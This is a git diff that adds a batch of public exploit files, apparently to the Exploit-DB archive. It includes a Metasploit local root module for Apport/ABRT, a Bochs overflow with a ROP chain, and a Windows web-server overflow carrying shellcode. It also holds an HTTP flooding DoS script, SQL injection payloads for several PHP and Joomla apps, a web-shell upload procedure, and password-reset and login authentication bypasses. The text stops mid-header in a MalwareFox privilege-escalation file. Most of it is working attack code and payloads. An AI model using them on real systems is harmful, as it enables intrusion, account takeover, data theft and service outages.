diff --git a/exploits/hardware/webapps/43981.txt b/exploits/hardware/webapps/43981.txt new file mode 100644 index 000000000..b221e6216 --- /dev/null +++ b/exploits/hardware/webapps/43981.txt @@ -0,0 +1,44 @@ +# Exploit Title: Netis-WF2419 HTML Injection +# Date: 20/01/2018 +# Exploit Author: Sajibe Kanti +# Author Contact :https://twitter.com/@sajibekantibd +# Vendor Homepage: http://www.netis-systems.com/ +# Version: Netis-WF2419 , V3.2.41381 +# Tested on: Windows 10 + +# CEV : CVE-2018-6190 + + + HTML Injection in Netis-WF2419 + + + +Netis-WF2419 is prone to an HTML-injection vulnerability because it fails +to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or script code could run in the context of the +affected site, potentially allowing the attacker to steal cookie-based +authentication credentials and control how the site is rendered to the +user; other attacks are also possible. + +Netis-WF2419 is vulnerable; + +Proof of Concept: + +1. Go to your wireless router ip (ex. 192.168.0.1) + +2. Go to Wireless Settings - tab + +3. Now Click MAC Filtering -tab + +4.Write MAC Address and in -Description- write (

XSS-PWD

) + +5.Click Add + +6. Now You Can See HTML Injection + + + +#Solution: + + Upgrade Firmware \ No newline at end of file diff --git a/exploits/linux/local/43971.rb b/exploits/linux/local/43971.rb new file mode 100755 index 000000000..27881b641 --- /dev/null +++ b/exploits/linux/local/43971.rb @@ -0,0 +1,185 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apport / ABRT chroot Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by + invoking the default coredump handler inside a namespace ("container"). + + Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are + vulnerable, due to a feature which allows forwarding reports to + a container's Apport by changing the root directory before loading + the crash report, causing 'usr/share/apport/apport' within the crashed + task's directory to be executed. + + Similarly, Fedora is vulnerable when the kernel crash handler is + configured to change root directory before executing ABRT, causing + 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be + executed. + + In both instances, the crash handler does not drop privileges, + resulting in code execution as root. + + This module has been tested successfully on Apport 2.14.1 on + Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Stéphane Graber', # Independent discovery, PoC and patch + 'Tavis Ormandy', # Independent discovery and C exploit + 'Ricardo F. Teixeira', # shell exploit + 'Brendan Coles ' # Metasploit + ], + 'DisclosureDate' => 'Mar 31 2015', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'References' => + [ + [ 'CVE', '2015-1318' ], + [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ], + # Exploits + [ 'EDB', '36782' ], + [ 'EDB', '36746' ], + [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ], + # ABRT (Fedora) + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ], + # Apport (Ubuntu) + [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ], + [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ], + [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ], + [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def check + kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first + + if kernel_version < Gem::Version.new('3.12') + vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable" + return CheckCode::Safe + end + + vprint_good "Linux kernel version #{kernel_version} is vulnerable" + + kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern' + + # Vulnerable core_pattern (abrt): + # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e + # Patched systems no longer preface the command with /usr/sbin/chroot + # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e + if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp') + vprint_good 'System is configured to chroot ABRT for crash reporting' + return CheckCode::Vulnerable + end + + # Vulnerable core_pattern (apport): + # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P + if kernel_core_pattern.include? 'apport' + vprint_good 'System is configured to use Apport for crash reporting' + + res = cmd_exec 'apport-cli --version' + + if res.blank? + vprint_error 'Apport is NOT installed' + return CheckCode::Safe + end + + apport_version = Gem::Version.new(res.split('-').first) + + if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1') + vprint_good "Apport version #{apport_version} is vulnerable" + return CheckCode::Vulnerable + end + + vprint_error "Apport version #{apport_version} is NOT vulnerable" + + return CheckCode::Safe + end + + vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting' + + CheckCode::Safe + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + if check != CheckCode::Vulnerable + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + # Upload Tavis Ormandy's newpid exploit: + # - https://www.exploit-db.com/exploits/36746/ + # Cross-compiled with: + # - i486-linux-musl-cc -static newpid.c + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid' + fd = ::File.open path, 'rb' + executable_data = fd.read fd.stat.size + fd.close + + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + upload_and_chmodx executable_path, executable_data + + # Upload payload executable + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + # newpid writes an 'exploit' directory + # which must be removed manually if exploitation fails + register_dir_for_cleanup "#{base_dir}/exploit" + + # Change working directory to base_dir, + # allowing newpid to create the required hard links + cmd_exec "cd '#{base_dir}'" + + print_status 'Launching exploit...' + output = cmd_exec executable_path + output.each_line { |line| vprint_status line.chomp } + + # Check for root privileges + id = cmd_exec 'id' + + unless id.include? 'root' + fail_with Failure::Unknown, 'Failed to gain root privileges' + end + + print_good 'Upgraded session to root privileges' + vprint_line id + + # Execute payload executable + vprint_status 'Executing payload...' + cmd_exec payload_path + end +end \ No newline at end of file diff --git a/exploits/linux/local/43979.py b/exploits/linux/local/43979.py new file mode 100755 index 000000000..1744d1198 --- /dev/null +++ b/exploits/linux/local/43979.py @@ -0,0 +1,116 @@ +# Exploit Author: Juan Sacco - http://exploitpack.com +# Vulnerability found using Exploit Pack v10 - Fuzzer module +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Program description: +# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that +# runs on most popular platforms. It includes emulation of the Intel x86 CPU, +# common I/O devices, and a custom BIOS. +# +# Homepage: http://bochs.sourceforge.net/ +# Version: 2.6-5 +# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb + +import os, subprocess +from struct import pack + +# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'` +# +# Program received signal SIGSEGV, Segmentation fault. +# +# [----------------------------------registers-----------------------------------] +# EAX: 0x1 +# EBX: 0x41414141 ('AAAA') +# ECX: 0x8167fa0 +(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov +edx,DWORD PTR [esp+0x8]) +# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90 +(<_ZN13bx_real_sim_cD2Ev>: repz ret) +# ESI: 0x41414141 ('AAAA') +# EDI: 0x41414141 ('AAAA') +# EBP: 0x41414141 ('AAAA') +# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/") +# EIP: 0x41424344 ('DCBA') +# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT +direction overflow) +# [-------------------------------------code-------------------------------------] +# Invalid $PC address: 0x41424344 +# [------------------------------------stack-------------------------------------] +# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/") +# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2 +# 0008| 0xbfffedc8 --> 0x0 +# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10) +# 0016| 0xbfffedd0 --> 0x2 +# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0 +# 0024| 0xbfffedd8 --> 0x0 +# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10) +# [------------------------------------------------------------------------------] +# Legend: code, data, rodata, value +# Stopped reason: SIGSEGV +# 0x41424344 in ?? () + +# Padding goes here +junk = 'A'*1200 +ropchain = pack('\'') + parser.add_argument('-p', help='Specify POST request. Usage: -p \'\'') + parser.add_argument('-d', help='Specify data payload for POST request', default=None) + parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*') + parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int) + args = parser.parse_args() + + global url, payload, additionalHeaders + additionalHeaders = args.ah + payload = args.d + + if args.g: + url = args.g + for i in range(args.t): + t = SendGETThread() + t.start() + + if args.p: + url = args.p + for i in range(args.t): + t = SendPOSTThread() + t.start() + + if len(sys.argv)==1: + parser.print_help() + exit() + +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/php/webapps/43963.txt b/exploits/php/webapps/43963.txt new file mode 100644 index 000000000..f9296fc5d --- /dev/null +++ b/exploits/php/webapps/43963.txt @@ -0,0 +1,37 @@ +Affected Code: + +public static function _uploadFile() { + +- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction() +- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) { + + +Proof of Concept +Steps to Reproduce: + +1. Login with a valid credentials +2. Select Files option from the Settings menu of Content +3. Upload a file with php extension containing the below code: + + + +4. Click on Upload +5. Once the file is uploaded Click on the uploaded file and add ?cmd= to +the URL followed by a system command such as whoami,time,date etc. +Example: +http://localhost:8081/wondercms/files/shell.php?cmd=dir + +Recommended Patch: + +Create a whitelist of allowed filetypes. + +The patch that addresses this bug is available here: + +https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split + +At line 742 \ No newline at end of file diff --git a/exploits/php/webapps/43964.txt b/exploits/php/webapps/43964.txt new file mode 100644 index 000000000..93c724727 --- /dev/null +++ b/exploits/php/webapps/43964.txt @@ -0,0 +1,28 @@ +# Exploit Title: Wonder CMS 2.3.1 Host Header Injection +# Date: 30-01-2018 +# Exploit Author: Samrat Das +# Contact: http://twitter.com/Samrat_Das93 +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://www.wondercms.com/ +# Version: 2.3.1 +# CVE : CVE-2017-14523 +# Category: Webapp CMS + +1. Description + +The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning + + + +2. Proof of Concept + +Intercept any web request of cms using a proxy tool. +Change the http host header to: +POST / HTTP/1.1 +Host: google.com + +You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/ + +3. Solution: + +To Mitigate host header injections allows only a whitelist of allowed hostnames. \ No newline at end of file diff --git a/exploits/php/webapps/43965.txt b/exploits/php/webapps/43965.txt new file mode 100644 index 000000000..772cf7371 --- /dev/null +++ b/exploits/php/webapps/43965.txt @@ -0,0 +1,17 @@ +# Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection +# Dork: N/A +# Date: 2018-02-03 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://www.phpscriptsmall.com/product/matrimonial-website-script/ +# Version: 2.1.6 +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands. +# # # # # +# Proof of Concept: + + + http://localhost/entrepreneur/view-profile.php?uid=[SQL] \ No newline at end of file diff --git a/exploits/php/webapps/43966.txt b/exploits/php/webapps/43966.txt new file mode 100644 index 000000000..b273f992c --- /dev/null +++ b/exploits/php/webapps/43966.txt @@ -0,0 +1,42 @@ +# # +# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection +# Dork: N/A +# Date: 03.02.2018 +# Vendor: https://www.nixdesign.de +# Software Link: https://www.nixdesign.de/nix-cms/ +# Demo: http://www.jamaram.de/ +# Version: 1.0 +# Tested on: WiN10_X64 +# Exploit Author: Bora Bozdogan +# Author WebSite : http://borabozdogan.net.tr +# Author E-mail : borayazilim45@mit.tc +# Author Skype : borayazilim45 +# # +# POC: +# +# http://localhost/[PATH]/single.php?category_id=[SQL] +# +# Parameter: category_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# +# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 15 columns +# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF +# +# # + +available databases [3]: +[*] information_schema +[*] usr_web24_1 +[*] web24_4 \ No newline at end of file diff --git a/exploits/php/webapps/43967.py b/exploits/php/webapps/43967.py new file mode 100755 index 000000000..eef24938b --- /dev/null +++ b/exploits/php/webapps/43967.py @@ -0,0 +1,70 @@ +# Exploit Title: Online Voting System - Authentication Bypass +# Date: 02.02.2018 +# Vendor Homepage: http://themashabrand.com +# Software Link: http://themashabrand.com/p/votin +# Demo: http://localhost/Onlinevoting +# Version: 1.0 +# Category: Webapps +# Exploit Author: Giulio Comi +# CVE : CVE-2018-6180 + + +#Description + +A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application. + +The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account. + +# Proof of Concept: + +#!/usr/bin/env python +import requests +from time import sleep +from lxml import html + + +def own(auth_bypass_request): + """ + Reset the password of a user just knowing his id + """ + url_edit_password = "admin/profile.php" + + payload = { + 'id': 1, + 'admin': 'admin', # overwrite the username of the victim + 'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim + 'edit': '' + } + + response = auth_bypass_request.post(target_site + url_edit_password, data=payload) + + # Parse response to check if the request was successful + check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()') + + return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]() + + +def login(login_request): + """ + Enjoy the new password chosen for the victim + """ + credentials = {'username': 'admin', + 'password': "ARBITRARY_PASSWORD", + 'usertype': 'admin', + 'login': '' + } + + response = login_request.post(target_site, data=credentials) + + print(response.text) + + +if __name__ == "__main__": + + target_site = "http://localhost/Onlinevoting/" + request = requests.Session() + if own(request): + sleep(4) # just a bit of delay + login(request) + else: + print('Maybe the given id is not registered in the application') \ No newline at end of file diff --git a/exploits/php/webapps/43974.txt b/exploits/php/webapps/43974.txt new file mode 100644 index 000000000..e5692a424 --- /dev/null +++ b/exploits/php/webapps/43974.txt @@ -0,0 +1,61 @@ + + + + + + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43975.html b/exploits/php/webapps/43975.html new file mode 100644 index 000000000..34512c2f7 --- /dev/null +++ b/exploits/php/webapps/43975.html @@ -0,0 +1,40 @@ + + + + + + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43976.txt b/exploits/php/webapps/43976.txt new file mode 100644 index 000000000..f7af1bf10 --- /dev/null +++ b/exploits/php/webapps/43976.txt @@ -0,0 +1,61 @@ + + + + + + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43977.php b/exploits/php/webapps/43977.php new file mode 100644 index 000000000..52c09d7cb --- /dev/null +++ b/exploits/php/webapps/43977.php @@ -0,0 +1,40 @@ +"; +foreach($l as $u){ + echo "[-] ID\n\n\n\n:\n" .$u['id']."
"; + echo "[-] Name\n\n:\n" .$u['name']."
"; + echo "[-] Email\n:\n" .$u['email']."
"; + echo "
"; +}echo "*-----------------------------*";} +else{echo "[-] No user";} +?> \ No newline at end of file diff --git a/exploits/php/webapps/43978.txt b/exploits/php/webapps/43978.txt new file mode 100644 index 000000000..08c2ac660 --- /dev/null +++ b/exploits/php/webapps/43978.txt @@ -0,0 +1,91 @@ +# # # # # +# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection +# Dork: N/A +# Date: 04.02.2018 +# Vendor Homepage: http://joomlaserviceprovider.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6609 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# Want To Donate ? +# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ +# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2 +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL] +# +# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari +# +# Parameter: ticketcode (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 29 columns +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG + +# 2) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL] +# +# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5) +# +# 3) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL] +# +# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5) +# +# 4) +# +#
+# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43980.txt b/exploits/php/webapps/43980.txt new file mode 100644 index 000000000..8f6403bc5 --- /dev/null +++ b/exploits/php/webapps/43980.txt @@ -0,0 +1,19 @@ +# Exploit title: Student Profile Management System Script 2.0.6 - Admin +Panel Authentication Bypass +# Dork: "Powered by: i-Net Solution" +# Date: 2018-02-06 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/ +# Version: 2.0.6 +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# With this exploit,Attacker can bypass admin panel Authentication. +# # # # # +# Proof of Concept: + +# username : anything +# password : admin' or 'a'='a +# admin panel login : /admin_login.php \ No newline at end of file diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c new file mode 100644 index 000000000..6daac8996 --- /dev/null +++ b/exploits/windows/dos/42341.c @@ -0,0 +1,121 @@ +#define _WINSOCK_DEPRECATED_NO_WARNINGS +#define DEFAULT_BUFLEN 512 + +#include +#include +#include +#include + +DWORD SendRequest(char *request, int request_size) { + WSADATA wsa; + SOCKET s; + struct sockaddr_in server; + char recvbuf[DEFAULT_BUFLEN]; + int recvbuflen = DEFAULT_BUFLEN; + int iResult; + + printf("\n[>] Initialising Winsock...\n"); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) + { + printf("[!] Failed. Error Code : %d", WSAGetLastError()); + return 1; + } + + printf("[>] Initialised.\n"); + if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) + { + printf("[!] Could not create socket : %d", WSAGetLastError()); + } + + printf("[>] Socket created.\n"); + server.sin_addr.s_addr = inet_addr("172.16.116.222"); + server.sin_family = AF_INET; + server.sin_port = htons(8080); + + if (connect(s, (struct sockaddr *)&server, sizeof(server)) < 0) + { + puts("[!] Connect error"); + return 1; + } + puts("[>] Connected"); + + if (send(s, request, request_size, 0) < 0) + { + puts("[!] Send failed"); + return 1; + } + puts("\n[>] Request sent\n"); + closesocket(s); + return 0; +} + +void EvilRequest() { + + char request_one[] = "POST /login HTTP/1.1\r\n" + "Host: 172.16.116.222\r\n" + "User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" + "Accept-Language: en-US,en;q=0.5\r\n" + "Referer: http://172.16.116.222/login\r\n" + "Connection: close\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + "Content-Length: "; + char request_two[] = "\r\n\r\nusername="; + + char *padding = malloc(780); + memset(padding, 0x41, 780); + memset(padding + 778, 0x00, 2); + unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll + + unsigned char shellcode[] = + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLIDE + "\xdb\xda\xbd\x92\xbc\xaf\xa7\xd9\x74\x24\xf4\x58\x31\xc9\xb1" + "\x52\x31\x68\x17\x83\xc0\x04\x03\xfa\xaf\x4d\x52\x06\x27\x13" + "\x9d\xf6\xb8\x74\x17\x13\x89\xb4\x43\x50\xba\x04\x07\x34\x37" + "\xee\x45\xac\xcc\x82\x41\xc3\x65\x28\xb4\xea\x76\x01\x84\x6d" + "\xf5\x58\xd9\x4d\xc4\x92\x2c\x8c\x01\xce\xdd\xdc\xda\x84\x70" + "\xf0\x6f\xd0\x48\x7b\x23\xf4\xc8\x98\xf4\xf7\xf9\x0f\x8e\xa1" + "\xd9\xae\x43\xda\x53\xa8\x80\xe7\x2a\x43\x72\x93\xac\x85\x4a" + "\x5c\x02\xe8\x62\xaf\x5a\x2d\x44\x50\x29\x47\xb6\xed\x2a\x9c" + "\xc4\x29\xbe\x06\x6e\xb9\x18\xe2\x8e\x6e\xfe\x61\x9c\xdb\x74" + "\x2d\x81\xda\x59\x46\xbd\x57\x5c\x88\x37\x23\x7b\x0c\x13\xf7" + "\xe2\x15\xf9\x56\x1a\x45\xa2\x07\xbe\x0e\x4f\x53\xb3\x4d\x18" + "\x90\xfe\x6d\xd8\xbe\x89\x1e\xea\x61\x22\x88\x46\xe9\xec\x4f" + "\xa8\xc0\x49\xdf\x57\xeb\xa9\xf6\x93\xbf\xf9\x60\x35\xc0\x91" + "\x70\xba\x15\x35\x20\x14\xc6\xf6\x90\xd4\xb6\x9e\xfa\xda\xe9" + "\xbf\x05\x31\x82\x2a\xfc\xd2\x01\xba\x8a\xef\x32\xb9\x72\xe1" + "\x9e\x34\x94\x6b\x0f\x11\x0f\x04\xb6\x38\xdb\xb5\x37\x97\xa6" + "\xf6\xbc\x14\x57\xb8\x34\x50\x4b\x2d\xb5\x2f\x31\xf8\xca\x85" + "\x5d\x66\x58\x42\x9d\xe1\x41\xdd\xca\xa6\xb4\x14\x9e\x5a\xee" + "\x8e\xbc\xa6\x76\xe8\x04\x7d\x4b\xf7\x85\xf0\xf7\xd3\x95\xcc" + "\xf8\x5f\xc1\x80\xae\x09\xbf\x66\x19\xf8\x69\x31\xf6\x52\xfd" + "\xc4\x34\x65\x7b\xc9\x10\x13\x63\x78\xcd\x62\x9c\xb5\x99\x62" + "\xe5\xab\x39\x8c\x3c\x68\x59\x6f\x94\x85\xf2\x36\x7d\x24\x9f" + "\xc8\xa8\x6b\xa6\x4a\x58\x14\x5d\x52\x29\x11\x19\xd4\xc2\x6b" + "\x32\xb1\xe4\xd8\x33\x90"; + + char request_three[] = "&password=A"; + + int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three); + int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three); + char *content_length_string = malloc(15); + sprintf(content_length_string, "%d", content_length); + + char *buffer = malloc(buffer_length); + memset(buffer, 0x00, buffer_length); + strcpy(buffer, request_one); + strcat(buffer, content_length_string); + strcat(buffer, request_two); + strcat(buffer, padding); + strcat(buffer, retn); + strcat(buffer, shellcode); + strcat(buffer, request_three); + + SendRequest(buffer, strlen(buffer)); +} + +int main() { + + EvilRequest(); + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/43973.c b/exploits/windows/local/43973.c new file mode 100644 index 000000000..fcb5edfaf --- /dev/null +++ b/exploits/windows/local/43973.c @@ -0,0 +1,207 @@ +/* +Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation +Date : 